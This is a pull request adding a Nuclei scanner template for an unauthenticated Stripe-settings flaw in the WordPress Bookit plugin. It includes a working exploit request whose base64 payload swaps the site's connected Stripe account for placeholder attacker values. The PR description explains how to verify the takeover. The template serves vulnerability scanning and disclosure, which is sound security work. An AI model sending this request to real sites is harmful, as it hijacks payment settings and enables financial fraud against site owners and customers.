### PR TITLE
Add CVE-2025-12841.yaml - Bookit < 2.5.1 - Unauthenticated Stripe Settings Update

### DIFF
--- a/http/cves/2025/CVE-2025-12841.yaml
+++ b/http/cves/2025/CVE-2025-12841.yaml
@@ -1,0 +1,63 @@
+id: CVE-2025-12841
+
+info:
+  name: WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.
+  impact: |
+   Remote attackers can modify Stripe payment options without authentication, potentially leading to financial fraud or service disruption.
+  remediation: |
+   Upgrade to version 2.5.1 or later.
+  reference:
+    - https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-12841
+    - https://wordpress.org/plugins/bookit/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
+    cvss-score: 8.2
+    cve-id: CVE-2025-12841
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 2
+    publicwww-query: "/wp-content/plugins/bookit/"
+  tags: cve,cve2025,wp,wp-plugin,wordpress,bookit,stripe,unauth,intrusive
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/bookit/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(to_lower(body), "bookit")'
+          - 'compare_versions(version, "< 2.5.1")'
+        internal: true
+        condition: and
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([\w.]+)'
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-json/bookit/v1/commerce/stripe/return?stripe=eyJzdHJpcGVfdXNlcl9pZCI6IkFDQ1RfSEFDS0VSIiwibGl2ZSI6eyJhY2Nlc3NfdG9rZW4iOiJza19saXZlX2hhY2tlciJ9LCJzYW5kYm94Ijp7ImFjY2Vzc190b2tlbiI6InNrX3Rlc3RfaGFja2VyIn0sImNsaWVudF9pZCI6ImNhX2hhY2tlciIsInB1Ymxpc2hhYmxlX2tleSI6InBrX2xpdmVfaGFja2VyIiwiY2xpZW50X3NlY3JldCI6InNrX2xpdmVfaGFja2VyIn0= HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains_all(to_lower(header), "bookit-settings", "x-redirect-by")'
+        condition: and


### PR DESCRIPTION
CVE-2025-12841 details added for WordPress Bookit plugin vulnerability.

**AFter Run the Template visit https://example.com/wp-admin/admin.php?page=bookit-settings&tc-stripe-error=tc-stripe-disconnect-error#payments**

**See that the connected Stripe user is `acct_HACKER`**

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References: https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
